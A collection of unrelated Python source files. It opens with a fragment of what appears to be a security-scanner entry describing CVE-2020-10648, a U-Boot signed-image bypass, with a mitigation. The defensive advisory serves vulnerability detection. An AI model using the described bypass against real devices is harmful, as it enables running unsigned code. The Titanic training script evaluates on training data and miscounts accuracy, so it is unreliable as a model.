# with fixes in 390b26dc270aa3159df0c31775f91cd374a3dd3a..0e29648f8e7e0aa60c0f7efe9d2efed98f8c0c6e
('CONFIG_FIT_SIGNATURE', True, {
'identifier': 'CVE-2020-10648',
'impact': SecurityImpact.VERIFICATION_BYPASS,
'summary':
'FIT image signature validation can be bypassed by tampering with an authentic image',
'description': dedent("""\
Prior to version 2020.04(-rc5), U-Boot did not verify that the contents of a FIT
image configuration's *hashed-nodes* was actually associated with the images used when
booting a specific configuration.
As a result, an attacker could append additional configurations that included their own
images to execute, but specify that the signatures be computed over legitimate images
contained in a different, authentic configuration.
In situations where an attacker can tamper with a FIT image, stage their own payloads,
and control which configuration is booted, this can allow signature validation to be
bypassed and arbitrary attacker-provided code to be executed.
Refer to the following advisory for additional information:
<https://labs.f-secure.com/advisories/das-u-boot-verified-boot-bypass>
"""),
'recommendation': dedent("""\'
Update to U-Boot 2020.04, or otherwise backport fixes merged in commit e0718b3a.
Per the F-Secure advisory, one possible mitigation is to explicitly specify the
configuration in the FIT image to boot: `bootm ${loadaddr}#conf@1 - ${fdtaddr}`
This mitigation, of course, assumes that an attacker is not able to otherwise tamper
with the bootloader environment (e.g. `bootcmd`).
Links:
<https://gitlab.denx.de/u-boot/u-boot/-/commit/e0718b3ab754860bd47677e6b4fc5b70da42c4ab>
<https://lists.denx.de/pipermail/u-boot/2020-March/403409.html>
<https://labs.f-secure.com/advisories/das-u-boot-verified-boot-bypass>
"""),
# FIXME: Advisory is a bit iffy on the 2018.03 minimum version, so we just use 0's here.
# Need to revisit this when I have time to spend on git archaeology in order to determine
# the first relevant version. Presumably there exists a version where the affected FIT
# signature or configuration functionally isn't even present, and this will be our minimum.
'affected_versions': ('0.0', '2020.04-rc5'),
})
)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com thumbor@googlegroups.com
from thumbor.ext.filters import _nine_patch
from thumbor.filters import BaseFilter, filter_method
from thumbor.loaders import LoaderResult
class Filter(BaseFilter):
regex = r"(?:frame\((?P<url>.*?))"
async def on_image_ready(self, buffer):
self.nine_patch_engine.load(buffer, None)
self.nine_patch_engine.enable_alpha()
self.engine.enable_alpha()
(
nine_patch_mode,
nine_patch_data,
) = self.nine_patch_engine.image_data_as_rgb()
padding = _nine_patch.get_padding(
nine_patch_mode,
nine_patch_data,
self.nine_patch_engine.size[0],
self.nine_patch_engine.size[1],
)
self.handle_padding(padding)
mode, data = self.engine.image_data_as_rgb()
if mode != nine_patch_mode:
raise RuntimeError(
f"Image mode mismatch: {mode} != {nine_patch_mode}"
)
imgdata = _nine_patch.apply(
mode,
data,
self.engine.size[0],
self.engine.size[1],
nine_patch_data,
self.nine_patch_engine.size[0],
self.nine_patch_engine.size[1],
)
self.engine.set_image_data(imgdata)
def handle_padding(self, padding):
"""Pads the image with transparent pixels if necessary."""
left = padding[0]
top = padding[1]
right = padding[2]
bottom = padding[3]
offset_x = 0
offset_y = 0
new_width = self.engine.size[0]
new_height = self.engine.size[1]
if left > 0:
offset_x = left
new_width += left
if top > 0:
offset_y = top
new_height += top
if right > 0:
new_width += right
if bottom > 0:
new_height += bottom
new_engine = self.context.modules.engine.__class__(self.context)
new_engine.image = new_engine.gen_image(
(new_width, new_height), "#fff"
)
new_engine.enable_alpha()
new_engine.paste(self.engine, (offset_x, offset_y))
self.engine.image = new_engine.image
async def on_fetch_done(self, result):
# TODO if result.successful is False how can the error be handled?
if isinstance(result, LoaderResult):
buffer = result.buffer
else:
buffer = result
self.nine_patch_engine.load(buffer, None)
await self.storage.put(self.url, self.nine_patch_engine.read())
await self.storage.put_crypto(self.url)
await self.on_image_ready(buffer)
@filter_method(BaseFilter.String)
async def frame(self, url):
self.url = url
self.nine_patch_engine = self.context.modules.engine.__class__(
self.context
)
self.storage = self.context.modules.storage
buffer = await self.storage.get(self.url)
if buffer is not None:
return await self.on_image_ready(buffer)
result = await self.context.modules.loader.load(self.context, self.url)
await self.on_fetch_done(result)
|
import torch
from .manifold import Manifold
from frechetmean.utils import EPS, cosh, sinh, tanh, arcosh, arsinh, artanh, sinhdiv, divsinh
class Poincare(Manifold):
def __init__(self, K=-1.0, edge_eps=1e-3):
super(Poincare, self).__init__()
self.edge_eps = 1e-3
assert K < 0
if torch.is_tensor(K):
self.K = K
else:
self.K = torch.tensor(K)
def sh_to_dim(self, sh):
if hasattr(sh, '__iter__'):
return sh[-1]
else:
return sh
def dim_to_sh(self, dim):
if hasattr(dim, '__iter__'):
return dim[-1]
else:
return dim
def zero(self, *shape):
return torch.zeros(*shape)
def zero_tan(self, *shape):
return torch.zeros(*shape)
def zero_like(self, x):
return torch.zeros_like(x)
def zero_tan_like(self, x):
return torch.zeros_like(x)
def lambda_x(self, x, keepdim=False):
return 2 / (1 + self.K * x.pow(2).sum(dim=-1, keepdim=keepdim)).clamp_min(min=EPS[x.dtype])
def inner(self, x, u, v, keepdim=False):
return self.lambda_x(x, keepdim=True).pow(2) * (u * v).sum(dim=-1, keepdim=keepdim)
def proju(self, x, u):
return u
def projx(self, x):
norm = x.norm(dim=-1, keepdim=True).clamp(min=EPS[x.dtype])
maxnorm = (1 - self.edge_eps) / (-self.K).sqrt()
cond = norm > maxnorm
projected = x / norm * maxnorm
return torch.where(cond, projected, x)
def egrad2rgrad(self, x, u):
return u / self.lambda_x(x, keepdim=True).pow(2)
def mobius_addition(self, x, y):
x2 = x.pow(2).sum(dim=-1, keepdim=True)
y2 = y.pow(2).sum(dim=-1, keepdim=True)
xy = (x * y).sum(dim=-1, keepdim=True)
num = (1 - 2 * self.K * xy - self.K * y2) * x + (1 + self.K * x2) * y
denom = 1 - 2 * self.K * xy + (self.K.pow(2)) * x2 * y2
return num / denom.clamp_min(EPS[x.dtype])
def exp(self, x, u):
u_norm = u.norm(dim=-1, keepdim=True).clamp_min(min=EPS[x.dtype])
second_term = (
tanh((-self.K).sqrt() / 2 * self.lambda_x(x, keepdim=True) * u_norm) * u / ((-self.K).sqrt() * u_norm)
)
gamma_1 = self.mobius_addition(x, second_term)
return gamma_1
def log(self, x, y):
sub = self.mobius_addition(-x, y)
sub_norm = sub.norm(dim=-1, keepdim=True).clamp_min(EPS[x.dtype])
lam = self.lambda_x(x, keepdim=True)
return 2 / ((-self.K).sqrt() * lam) * artanh((-self.K).sqrt() * sub_norm) * sub / sub_norm
def dist(self, x, y, squared=False, keepdim=False):
dist = 2 * artanh((-self.K).sqrt() * self.mobius_addition(-x, y).norm(dim=-1)) / (-self.K).sqrt()
return dist.pow(2) if squared else dist
def _gyration(self, u, v, w):
u2 = u.pow(2).sum(dim=-1, keepdim=True)
v2 = v.pow(2).sum(dim=-1, keepdim=True)
uv = (u * v).sum(dim=-1, keepdim=True)
uw = (u * w).sum(dim=-1, keepdim=True)
vw = (v * w).sum(dim=-1, keepdim=True)
a = - self.K.pow(2) * uw * v2 - self.K * vw + 2 * self.K.pow(2) * uv * vw
b = - self.K.pow(2) * vw * u2 + self.K * uw
d = 1 - 2 * self.K * uv + self.K.pow(2) * u2 * v2
return w + 2 * (a * u + b * v) / d.clamp_min(EPS[u.dtype])
def transp(self, x, y, u):
return (
self._gyration(y, -x, u)
* self.lambda_x(x, keepdim=True)
/ self.lambda_x(y, keepdim=True)
)
def __str__(self):
return 'Poincare Ball'
def squeeze_tangent(self, x):
return x
def unsqueeze_tangent(self, x):
return x
|
# BSD 3-Clause License
#
# Copyright (c) 2012, the Sentry Team, see AUTHORS for more details
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
import base64
import os
import re
from functools import partial
from elasticapm.conf import constants
from elasticapm.utils import compat, encoding
try:
from functools import partialmethod
partial_types = (partial, partialmethod)
except ImportError:
# Python 2
partial_types = (partial,)
default_ports = {"https": 443, "http": 80, "postgresql": 5432}
def varmap(func, var, context=None, name=None):
"""
Executes ``func(key_name, value)`` on all values,
recursively discovering dict and list scoped
values.
"""
if context is None:
context = set()
objid = id(var)
if objid in context:
return func(name, "<...>")
context.add(objid)
if isinstance(var, dict):
ret = dict((k, varmap(func, v, context, k)) for k, v in compat.iteritems(var))
elif isinstance(var, (list, tuple)):
ret = func(name, [varmap(func, f, context, name) for f in var])
else:
ret = func(name, var)
context.remove(objid)
return ret
def get_name_from_func(func):
# partials don't have `__module__` or `__name__`, so we use the values from the "inner" function
if isinstance(func, partial_types):
return "partial({})".format(get_name_from_func(func.func))
elif hasattr(func, "_partialmethod") and hasattr(func._partialmethod, "func"):
return "partial({})".format(get_name_from_func(func._partialmethod.func))
module = func.__module__
if hasattr(func, "__name__"):
view_name = func.__name__
else: # Fall back if there's no __name__
view_name = func.__class__.__name__
return "{0}.{1}".format(module, view_name)
def build_name_with_http_method_prefix(name, request):
return " ".join((request.method, name)) if name else name
def is_master_process():
# currently only recognizes uwsgi master process
try:
import uwsgi
return os.getpid() == uwsgi.masterpid()
except ImportError:
return False
def get_url_dict(url):
scheme, netloc, path, params, query, fragment = compat.urlparse.urlparse(url)
if ":" in netloc:
hostname, port = netloc.split(":")
else:
hostname, port = (netloc, None)
url_dict = {
"full": encoding.keyword_field(url),
"protocol": scheme + ":",
"hostname": encoding.keyword_field(hostname),
"pathname": encoding.keyword_field(path),
}
if port:
url_dict["port"] = port
if query:
url_dict["search"] = encoding.keyword_field("?" + query)
return url_dict
def sanitize_url(url):
if "@" not in url:
return url
parts = compat.urlparse.urlparse(url)
return url.replace("%s:%s" % (parts.username, parts.password), "%s:%s" % (parts.username, constants.MASK))
def read_pem_file(file_obj):
cert = b""
for line in file_obj:
if line.startswith(b"-----BEGIN CERTIFICATE-----"):
break
for line in file_obj:
if not line.startswith(b"-----END CERTIFICATE-----"):
cert += line.strip()
return base64.b64decode(cert)
def starmatch_to_regex(pattern):
i, n = 0, len(pattern)
res = []
while i < n:
c = pattern[i]
i = i + 1
if c == "*":
res.append(".*")
else:
res.append(re.escape(c))
return re.compile(r"(?:%s)\Z" % "".join(res), re.IGNORECASE | re.DOTALL)
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from chardistribution import EUCTWDistributionAnalysis
from codingstatemachine import CodingStateMachine
from mbcharsetprober import MultiByteCharSetProber
from mbcssm import EUCTWSMModel
class EUCTWProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(EUCTWSMModel)
self._mDistributionAnalyzer = EUCTWDistributionAnalysis()
self.reset()
def get_charset_name(self):
return "EUC-TW"
|
from dagster_celery.executor import CELERY_CONFIG
from dagster_k8s import DagsterK8sJobConfig
from dagster import Field, Noneable, StringSource
from dagster.core.host_representation.handle import IN_PROCESS_NAME
from dagster.utils import merge_dicts
CELERY_K8S_CONFIG_KEY = "celery-k8s"
def celery_k8s_config():
# DagsterK8sJobConfig provides config schema for specifying Dagster K8s Jobs
job_config = DagsterK8sJobConfig.config_type_pipeline_run()
additional_config = {
"load_incluster_config": Field(
bool,
is_required=False,
default_value=True,
description="""Set this value if you are running the launcher within a k8s cluster. If
``True``, we assume the launcher is running within the target cluster and load config
using ``kubernetes.config.load_incluster_config``. Otherwise, we will use the k8s config
specified in ``kubeconfig_file`` (using ``kubernetes.config.load_kube_config``) or fall
back to the default kubeconfig. Default: ``True``.""",
),
"kubeconfig_file": Field(
Noneable(str),
is_required=False,
description="Path to a kubeconfig file to use, if not using default kubeconfig.",
),
"job_namespace": Field(
StringSource,
is_required=False,
default_value="default",
description="The namespace into which to launch new jobs. Note that any "
"other Kubernetes resources the Job requires (such as the service account) must be "
'present in this namespace. Default: ``"default"``',
),
"repo_location_name": Field(
StringSource,
is_required=False,
default_value=IN_PROCESS_NAME,
description="The repository location name to use for execution.",
),
}
cfg = merge_dicts(CELERY_CONFIG, job_config)
cfg = merge_dicts(cfg, additional_config)
return cfg
def get_celery_engine_config():
return {
"execution": {
CELERY_K8S_CONFIG_KEY: {
"config": {
"job_image": {"env": "DAGSTER_K8S_PIPELINE_RUN_IMAGE"},
"job_namespace": {"env": "DAGSTER_K8S_PIPELINE_RUN_NAMESPACE"},
"image_pull_policy": {"env": "DAGSTER_K8S_PIPELINE_RUN_IMAGE_PULL_POLICY"},
"env_config_maps": [{"env": "DAGSTER_K8S_PIPELINE_RUN_ENV_CONFIGMAP"}],
}
}
}
}
def get_celery_engine_grpc_config():
return {
"execution": {
CELERY_K8S_CONFIG_KEY: {
"config": {
"job_namespace": {"env": "DAGSTER_K8S_PIPELINE_RUN_NAMESPACE"},
"image_pull_policy": {"env": "DAGSTER_K8S_PIPELINE_RUN_IMAGE_PULL_POLICY"},
"env_config_maps": [{"env": "DAGSTER_K8S_PIPELINE_RUN_ENV_CONFIGMAP"}],
}
}
}
}
|
from common import *
|
import numpy as np
from . import constants
class Object:
def __init__(self, world, pos):
self.world = world
self.pos = np.array(pos)
self.random = world.random
self.health = 0
@property
def texture(self):
raise 'unknown'
@property
def walkable(self):
return constants.walkable
def move(self, direction):
direction = np.array(direction)
target = self.pos + direction
if self.is_free(target):
self.world.move(self, target)
return True
return False
def is_free(self, target, materials=None):
materials = self.walkable if materials is None else materials
material, obj = self.world[target]
return obj is None and material in materials
def distance(self, target):
if hasattr(target, 'pos'):
target = target.pos
return np.abs(target - self.pos).sum()
def toward(self, target, long_axis=True):
if hasattr(target, 'pos'):
target = target.pos
offset = target - self.pos
dists = np.abs(offset)
if (dists[0] > dists[1] if long_axis else dists[0] <= dists[1]):
return np.array((np.sign(offset[0]), 0))
else:
return np.array((0, np.sign(offset[1])))
def random_dir(self):
dirs = ((-1, 0), (+1, 0), (0, -1), (0, +1))
return dirs[self.random.randint(0, len(dirs))]
class Player(Object):
def __init__(self, world, pos):
super().__init__(world, pos)
self.facing = (0, 1)
@property
def texture(self):
if self.world[self.pos][0] == 'water':
return 'player-water'
else:
return 'player'
# return {
# (-1, 0): 'player-left',
# (+1, 0): 'player-right',
# (0, -1): 'player-up',
# (0, +1): 'player-down',
# }[tuple(self.facing)]
@property
def walkable(self):
return constants.walkable
def update(self, action):
target = (self.pos[0] + self.facing[0], self.pos[1] + self.facing[1])
material, obj = self.world[target]
# When in water move randomly, with current moving left.
if self.world[self.pos][0] == 'water':
action = self.random.choice(
[0, 1, 2, 3, 4], p=[0.2, 0.25, 0.15, 0.2, 0.2])
action = constants.actions[action]
if action == 'noop':
pass
elif action.startswith('move_'):
self._move(action[len('move_'):])
def _move(self, direction):
dirs = dict(left=(-1, 0), right=(+1, 0), up=(0, -1), down=(0, +1))
self.facing = dirs[direction]
self.move(self.facing)
|
import torch.utils.data as data
from PIL import Image
import os
import os.path
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
print('the data loader file has benn modified')
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm']
def is_image_file(filename):
"""Checks if a file is an image.
Args:
filename (string): path to a file
Returns:
bool: True if the filename ends with a known image extension
"""
filename_lower = filename.lower()
return any(filename_lower.endswith(ext) for ext in IMG_EXTENSIONS)
def find_classes(dir):
classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def make_dataset(dir, class_to_idx):
images = []
dir = os.path.expanduser(dir)
for target in sorted(os.listdir(dir)):
d = os.path.join(dir, target)
if not os.path.isdir(d):
continue
for root, _, fnames in sorted(os.walk(d)):
for fname in sorted(fnames):
if is_image_file(fname):
path = os.path.join(root, fname)
item = (path, class_to_idx[target])
images.append(item)
return images
def pil_loader(path):
# open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert('RGB')
def accimage_loader(path):
import accimage
try:
return accimage.Image(path)
except IOError:
# Potentially a decoding problem, fall back to PIL.Image
return pil_loader(path)
def default_loader(path):
from torchvision import get_image_backend
if get_image_backend() == 'accimage':
return accimage_loader(path)
else:
return pil_loader(path)
class ImageFolder_new(data.Dataset):
"""A generic data loader where the images are arranged in this way: ::
root/dog/xxx.png
root/dog/xxy.png
root/dog/xxz.png
root/cat/123.png
root/cat/nsdf3.png
root/cat/asd932_.png
Args:
root (string): Root directory path.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
loader (callable, optional): A function to load an image given its path.
Attributes:
classes (list): List of the class names.
class_to_idx (dict): Dict with items (class_name, class_index).
imgs (list): List of (image path, class_index) tuples
"""
def __init__(self, root, transform=None, target_transform=None,
loader=default_loader):
classes, class_to_idx = find_classes(root)
imgs = make_dataset(root, class_to_idx)
if len(imgs) == 0:
raise(RuntimeError("Found 0 images in subfolders of: " + root + "\n"
"Supported image extensions are: " + ",".join(IMG_EXTENSIONS)))
self.root = root
self.imgs = imgs
self.classes = classes
self.class_to_idx = class_to_idx
self.transform = transform
self.target_transform = target_transform
self.loader = loader
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
path, target = self.imgs[index]
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.imgs)
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
|
"""
django-admin-tools is a collection of extensions/tools for the default django
administration interface, it includes:
* a full featured and customizable dashboard,
* a customizable menu bar,
* tools to make admin theming easier.
"""
VERSION = '0.4.0'
|
# Command line arguments
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('bnc_path', help='The path to the BNC corpus files')
ap.add_argument('dataset_path', help='The path to the dataset directory with the BNC IDs')
ap.add_argument('out_path', help='Where to save the dataset with the sentences from BNC')
args = ap.parse_args()
import logging
logger = logging.getLogger(__name__)
import os
import re
import json
import tqdm
import spacy
import codecs
import logging
logger = logging.getLogger(__name__)
import xml.etree.ElementTree as ET
from unidecode import unidecode
from allennlp.data.tokenizers import WordTokenizer
def main():
bnc_reader = BNCDatasetReader(args.bnc_path)
dataset = {}
for s in ['train', 'test', 'val']:
in_file = os.path.join(args.dataset_path, f'ids_{s}.jsonl')
logger.info(f'Reading from {in_file}')
dataset[s] = []
with codecs.open(in_file, 'r', 'utf-8') as f_in:
for line in tqdm.tqdm(f_in):
try:
curr_example_json = json.loads(line.strip())
instance = bnc_reader.get_single_instance_from_json(curr_example_json)
if instance is not None:
dataset[s].append(instance)
except:
logger.warning(f'Error in line: {line}')
pass
for s in ['train', 'test', 'val']:
out_file = os.path.join(args.out_path, f'{s}.jsonl')
logger.info(f'Writing the to {out_file}')
with codecs.open(out_file, 'w', 'utf-8') as f_out:
for instance in dataset[s]:
f_out.write(json.dumps(instance) + '\n')
class BNCDatasetReader:
"""
Reads sentences from the BNC corpus given a sentence ID.
If you didn't download the BNC corpus yet, please do so.
"""
def __init__(self, bnc_corpus_path):
self._tokenizer = WordTokenizer()
self.bnc_corpus_path = bnc_corpus_path
self.nlp = spacy.load('en')
def get_single_instance_from_json(self, curr_example_json):
"""
Reads a sentence from the BNC corpus from its ID and returns an item or None if invalid.
"""
instance = None
sentence_id = curr_example_json['bnc_id']
# Get the sentence. The format of the BNCID is: BNC_file_dir/BNC_xml_fileName/sentence_number
items = sentence_id.split('/')
curr_sentence_id = items[-1]
curr_sentence_file_path = '/'.join(items[:-1])
tree = ET.parse(os.path.join(self.bnc_corpus_path, curr_sentence_file_path))
root = tree.getroot()
sentence = ''
for element in root.findall(".//s[@n='{}']".format(curr_sentence_id)):
sentence = ''.join(element.itertext())
if sentence != '':
try:
# Remove unicode punctuation
sentence = re.sub('\s+', ' ', unidecode(sentence)).lower()
span_text = curr_example_json['span_text']
span_text = re.sub('\s+', ' ', unidecode(span_text)).lower()
# Lemmatize the sentence
tokens = [t for t in self.nlp(sentence)]
lemmas = [t.lemma_ if t.lemma_ != '-PRON-' else t.lower_ for t in tokens]
lemmas = [lemma if lemma != "n't" else "not" for lemma in lemmas]
# Lemmatize the span.
span_tokens = [t for t in self.nlp(span_text)]
span_lemmas = [t.lemma_ if t.lemma_ != '-PRON-' else t.lower_ for t in span_tokens]
span_lemmas = [lemma if lemma != "n't" else "not" for lemma in span_lemmas]
# Find the span within the sentence
index_within_sentence = [i for i in range(len(lemmas) - len(span_lemmas) + 1) if
lemmas[i:i + len(span_lemmas)] == span_lemmas]
if len(index_within_sentence) > 0:
start_token_index = index_within_sentence[0]
end_token_index = start_token_index + len(span_lemmas) - 1
label = curr_example_json['label']
tokenized_sentence = ' '.join([t.text for t in tokens])
assert(' '.join(lemmas[start_token_index:end_token_index+1]) == span_text)
instance = { 'bnc_id': sentence_id,
'sentence': tokenized_sentence,
'start': start_token_index,
'end': end_token_index,
'span_text': span_text,
'label': label }
else:
lemmatized_sent = ' '.join(lemmas)
lemmatized_span = ' '.join(span_lemmas)
logger.warning(f'Failed to find span. Sentence: "{sentence}", ' +
f'sentence lemmatized: "{lemmatized_sent}", ' +
f'span: "{span_text}", span lemmatized: "{lemmatized_span}"')
except Exception as e:
logger.warning(e)
return instance
if __name__ == '__main__':
main()
|
import torch
import torch.nn as nn
import torchvision.transforms as transforms
import torchvision.datasets as dsets
from torch.autograd import Variable
import numpy as np
import matplotlib.pyplot as plot
import collections
import pandas as pd
def substrings_in_string(big_string, substrings):
for i in range(len(substrings)):
if big_string.find(substrings[i]) != -1:
return i + 1
return 0
# Load data
train_df = pd.read_csv('train.csv')
test_df = pd.read_csv('test.csv')
# Preprocessing
train_df['Age'].fillna(train_df['Age'].mean(), inplace=True)
test_df['Age'].fillna(test_df['Age'].mean(), inplace=True)
train_df['Ticket'] = train_df['Ticket'].str.extract('(\d+)')
test_df['Ticket'] = test_df['Ticket'].str.extract('(\d+)')
train_df['Ticket'].fillna(0, inplace=True)
test_df['Ticket'].fillna(0, inplace=True)
train_df['Ticket'] = pd.to_numeric(train_df['Ticket'])
test_df['Ticket'] = pd.to_numeric(test_df['Ticket'])
title_list=['Mrs', 'Mr', 'Master', 'Miss', 'Major', 'Rev',
'Dr', 'Ms', 'Mlle','Col', 'Capt', 'Mme', 'Countess',
'Don', 'Jonkheer']
cabin_list = ['A', 'B', 'C', 'D', 'E', 'F', 'T', 'G', 'Unknown']
train_df['Title']=train_df['Name'].map(lambda x: substrings_in_string(x, title_list))
train_df['Deck']=train_df['Cabin'].map(lambda x: substrings_in_string(str(x), cabin_list))
train_df['Family_Size']=train_df['SibSp']+train_df['Parch']
train_df['Age*Class']=train_df['Age']*train_df['Pclass']
train_df['Fare_Per_Person']=train_df['Fare']/(train_df['Family_Size']+1)
test_df['Title']=test_df['Name'].map(lambda x: substrings_in_string(x, title_list))
test_df['Deck']=test_df['Cabin'].map(lambda x: substrings_in_string(str(x), cabin_list))
test_df['Family_Size']=test_df['SibSp']+test_df['Parch']
test_df['Age*Class']=test_df['Age']*test_df['Pclass']
test_df['Fare_Per_Person']=test_df['Fare']/(test_df['Family_Size']+1)
train_df.drop(columns=['PassengerId','Ticket','Name','Cabin'], inplace=True)
test_df.drop(columns=['PassengerId','Ticket','Name','Cabin'], inplace=True)
train_df['Embarked'].fillna('D', inplace=True)
test_df['Embarked'].fillna('D', inplace=True)
cleanup_nums = {"Sex": {"male": 0, "female": 1},
"Embarked": {"S": 1, "C": 2, "Q": 3, 'D': 0 }}
train_df.replace(cleanup_nums, inplace=True)
test_df.replace(cleanup_nums, inplace=True)
# train_loader = torch.utils.data.DataLoader(dataset = train_tensor, batch_size = batch_size, shuffle = True)
batch_size = 100
# n_iters = 6000
# num_epochs = n_iters / (len(train_dataset) / batch_size)
# num_epochs = int(num_epochs)
num_epochs = 20000
input_dim = 12
output_dim = 2
train_target = torch.tensor(train_df['Survived'].values[0:700])
train = torch.tensor(train_df.drop('Survived', axis = 1).values[0:700])
train_tensor = torch.utils.data.TensorDataset(train, train_target)
train_loader = torch.utils.data.DataLoader(dataset=train_tensor,
batch_size=batch_size,
shuffle=True)
val_target = torch.tensor(train_df['Survived'].values[700:-1])
val = torch.tensor(train_df.drop('Survived', axis = 1).values[700:-1])
val_tensor = torch.utils.data.TensorDataset(val, val_target)
val_loader = torch.utils.data.DataLoader(dataset=train_tensor,
batch_size=batch_size,
shuffle=False)
test = torch.tensor(test_df.values.astype(np.float))
test_tensor = torch.utils.data.TensorDataset(test)
test_loader = torch.utils.data.DataLoader(dataset=test_tensor,
shuffle=False)
isinstance (train_loader,collections.Iterable)
class LogisticRegressionModel(nn.Module):
def __init__(self, input_dim, hidden_layers, output_dim, activation_layer):
super(LogisticRegressionModel, self).__init__()
self.input_layer = nn.Linear(input_dim, hidden_layers[0])
self.linears = nn.ModuleList([nn.Linear(hidden_layers[i-1], hidden_layers[i]) for i in range(1, len(hidden_layers))])
self.output_layer = nn.Linear(hidden_layers[-1], output_dim)
if activation_layer == 'relu':
self.activation_layer = nn.ReLU()
elif activation_layer == 'sigmoid':
self.activation_layer = nn.Sigmoid()
def forward(self,x):
out = self.input_layer(x)
out = self.activation_layer(out)
for i in range(len(self.linears)):
out = self.linears[i](out)
out = self.activation_layer(out)
out = self.output_layer(out)
return out
hidden_layers = [35, 35, 35]
activation_layer = 'relu'
model = LogisticRegressionModel(input_dim, hidden_layers, output_dim, activation_layer)
model = model.double()
if torch.cuda.is_available():
model.cuda()
criterion = nn.CrossEntropyLoss()
learning_rate = 0.005
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)
iter = 0
for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
if torch.cuda.is_available():
images = Variable(images.view(-1, input_dim).cuda())
labels = Variable(labels.cuda())
else:
images = Variable(images.view(-1, input_dim))
labels = Variable(labels)
# Clear gradients w.r.t. parameters
optimizer.zero_grad()
# Forward pass to get output/logits
outputs = model(images)
# Calculate Loss: softmax --> cross entropy loss
loss = criterion(outputs, labels)
# Getting gradients w.r.t. parameters
loss.backward()
# Updating parameters
optimizer.step()
iter += 1
if iter %100 == 0:
print('Iteration: {}. Loss: {} '.format(iter, loss.data[0]))
if iter %500 == 0:
# Calculate Accuracy
correct = 0
total = 0
# Iterate through test dataset
for i, (images, labels) in enumerate(val_loader):
if torch.cuda.is_available():
images = Variable(images.view(-1, input_dim).cuda())
labels = Variable(labels.cuda())
else:
images = Variable(images.view(-1, input_dim))
labels = Variable(labels)
# Forward pass only to get logits/output
outputs = model(images)
# Get predictions from the maximum value
_, predicted = torch.max(outputs.data, 1)
# Total number of labels
total += 1
correct += (predicted.cpu() == labels.cpu()).sum()
accuracy = 100 * correct / total
# Print Loss
print('%Iteration: {}. Loss: {}. Accuracy: {}'.format(iter, loss.data[0], accuracy))
# Iterate through test dataset
id = 892
for images in test_loader:
if torch.cuda.is_available():
images = Variable(images[0].view(-1, input_dim).cuda())
else:
images = Variable(images[0].view(-1, input_dim))
# Forward pass only to get logits/output
outputs = model(images)
# Get predictions from the maximum value
_, predicted = torch.max(outputs.data, 1)
print(str(id) + "," + str(int(predicted.cpu())))
id += 1
|
import logging
